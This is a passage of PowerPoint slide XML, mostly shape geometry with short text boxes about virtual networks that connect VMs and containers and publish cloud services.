                <a:lnTo>
                  <a:pt x="51641" y="1777277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29791" y="1737871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13571" y="1695315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3475" y="1650106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1602740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320548"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0075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105405" y="6528944"/>
            <a:ext cx="3204210" cy="11734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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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which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operate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manage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cloud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 systems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99176" y="3048000"/>
            <a:ext cx="4998720" cy="1752600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4998720" h="1752600">
                <a:moveTo>
                  <a:pt x="0" y="292100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3823" y="244727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14894" y="199786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32609" y="157877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56367" y="119603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85566" y="85566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119603" y="56367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157877" y="32609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199786" y="14894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244727" y="3823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292100" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4706620" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4753992" y="3823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4798933" y="14894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4840842" y="32609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4879116" y="56367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4913153" y="85566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4942352" y="119603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4966110" y="157877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4983825" y="199786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4994896" y="244727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4998720" y="292100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4998720" y="1460500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4994896" y="1507872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4983825" y="1552813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4966110" y="1594722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4942352" y="1632996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4913153" y="1667033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4879116" y="1696232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4840842" y="1719990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4798933" y="1737705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4753992" y="1748776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4706620" y="1752600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292100" y="1752600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244727" y="1748776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199786" y="1737705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157877" y="1719990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119603" y="1696232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85566" y="1667033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56367" y="1632996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32609" y="1594722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14894" y="1552813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3823" y="1507872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1460500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="292100"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="E3B36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144005" y="3299333"/>
            <a:ext cx="3796665" cy="11734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 indent="1270">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Vir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ual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netwo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ks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est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bl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ed  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between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VM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contai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ers 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within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cloud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407395" y="6304788"/>
            <a:ext cx="3810000" cy="1697989"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3810000" h="1697990">
                <a:moveTo>
                  <a:pt x="0" y="282956"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3705" y="237074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14431" y="193543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31594" y="152948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54612" y="115872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82899" y="82899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115872" y="54612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152948" y="31594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193543" y="14431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237074" y="3705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282955" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3527044" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3572925" y="3705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3616456" y="14431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3657051" y="31594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3694127" y="54612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3727100" y="82899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3755387" y="115872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3778405" y="152948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3795568" y="193543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3806294" y="237074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3810000" y="282956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3810000" y="1414780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3806294" y="1460677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3795568" y="1504216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3778405" y="1544815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3755387" y="1581890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3727100" y="1614860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3694127" y="1643142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3657051" y="1666153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3616456" y="1683310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3572925" y="1694032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3527044" y="1697736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282955" y="1697736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237074" y="1694032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193543" y="1683310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152948" y="1666153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115872" y="1643142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82899" y="1614860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54612" y="1581890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31594" y="1544815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14431" y="1504216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3705" y="1460677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1414780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="282956"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="EE63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0752835" y="6528944"/>
            <a:ext cx="3190875" cy="11734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>
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Virtual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networks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by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which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cloud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services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are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published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599176" y="4655820"/>
            <a:ext cx="4998720" cy="3709670"/>
            <a:chOff x="5599176" y="4655820"/>
            <a:chExt cx="4998720" cy="3709670"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5599176" y="5942076"/>
              <a:ext cx="2421890" cy="2423160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2421890" h="2423159">
                  <a:moveTo>
                    <a:pt x="1175639" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1128129" y="2154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1081116" y="6122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034634" y="11869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988716" y="19362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943397" y="28566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="898712" y="39447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854694" y="51970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811378" y="66101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768798" y="81806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726989" y="99050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685984" y="117800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645818" y="138020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606525" y="159678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568139" y="182738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530696" y="207165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494228" y="232927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458771" y="259988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424358" y="288315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391025" y="317873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358804" y="348627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327731" y="380543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297839" y="413588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269163" y="447727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241738" y="482925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215597" y="519148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190775" y="556363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167305" y="594534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145224" y="633627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124563" y="673609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105359" y="714444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87645" y="756099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71455" y="798540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56824" y="841731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43785" y="885639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32374" y="930229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22625" y="975468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14571" y="1021320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8247" y="1067752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3688" y="1114729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927" y="1162218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957" y="1258960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3807" y="1307249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8512" y="1355014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15038" y="1402219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23348" y="1448826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33407" y="1494800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45178" y="1540104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58627" y="1584703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73718" y="1628559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90414" y="1671637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108680" y="1713901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128481" y="1755314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149780" y="1795840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172541" y="1835442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196730" y="1874085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222310" y="1911731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249246" y="1948346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277501" y="1983892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307040" y="2018334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337828" y="2051634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369828" y="2083757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403005" y="2114667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437323" y="2144327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472746" y="2172701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509239" y="2199753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546766" y="2225446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585291" y="2249745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624778" y="2272612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665192" y="2294012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706497" y="2313908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748656" y="2332265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791635" y="2349045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835398" y="2364213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879909" y="2377733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925131" y="2389567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971030" y="2399680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1017570" y="2408036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1064715" y="2414598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112429" y="2419330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160676" y="2422196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="2423160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258170" y="2422196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306432" y="2419330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354169" y="2414598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401345" y="2408036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1447925" y="2399680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493872" y="2389567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1539149" y="2377733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583721" y="2364213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627550" y="2349045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670602" y="2332265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712840" y="2313908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754227" y="2294012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1794727" y="2272612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1834305" y="2249745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872923" y="2225446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910546" y="2199753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1947137" y="2172701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1982661" y="2144327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017080" y="2114667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050359" y="2083757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082461" y="2051634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113351" y="2018334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142991" y="1983892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2171347" y="1948346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198381" y="1911731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2224057" y="1874085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248339" y="1835442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271191" y="1795840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2292576" y="1755314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2312459" y="1713901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330803" y="1671637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2347572" y="1628559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362730" y="1584703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2376240" y="1540104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388066" y="1494800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2398173" y="1448826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406523" y="1402219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413080" y="1355014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417809" y="1307249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420673" y="1258960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421635" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420590" y="1159333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417479" y="1109037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2412343" y="1059332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2405222" y="1010254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396154" y="961840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2385179" y="914126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372337" y="867149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357667" y="820946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2341210" y="775554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2323004" y="731008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303088" y="687347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2281504" y="644606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258290" y="602822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233485" y="562031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2207129" y="522271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2179263" y="483578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149924" y="445989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2119154" y="409540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2086991" y="374269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1659381" y="804926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690709" y="842626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1718966" y="882483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1743987" y="924357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1765609" y="968110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783668" y="1013602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798000" y="1060694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808440" y="1109248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1814824" y="1159123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1816989" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815155" y="1257562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809744" y="1303928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800895" y="1349146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788742" y="1393084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773424" y="1435609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1755076" y="1476587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733836" y="1515886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709841" y="1553372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1683228" y="1588912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654132" y="1622374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622692" y="1653624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589043" y="1682529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1553323" y="1708957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515669" y="1732773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476218" y="1753846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435105" y="1772042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392469" y="1787228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348445" y="1799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303171" y="1808037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256784" y="1813395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="1815211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162075" y="1813395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115741" y="1808037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070551" y="1799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026638" y="1787228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984136" y="1772042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943177" y="1753846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903896" y="1732773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866425" y="1708957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830898" y="1682529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797447" y="1653624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766206" y="1622374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737308" y="1588912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710886" y="1553372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687074" y="1515886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666005" y="1476587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="1435609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632627" y="1393084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620586" y="1349146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611819" y="1303928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606462" y="1257562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604647" y="1210183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606462" y="1162802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611819" y="1116434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620586" y="1071212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="632627" y="1027269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647812" y="984738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666005" y="943753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687074" y="904446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710886" y="866952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737308" y="831403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766206" y="797932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797447" y="766673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830898" y="737759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866425" y="711323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903896" y="687498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943177" y="666417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984136" y="648214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026638" y="633022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070551" y="620974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115741" y="612204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1162075" y="606844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209421" y="605028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251527" y="606577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1293098" y="611044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1333597" y="618154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1372489" y="627634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346684" y="583669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322517" y="538846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1300027" y="493202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279251" y="446775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260227" y="399603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1242993" y="351725"/>
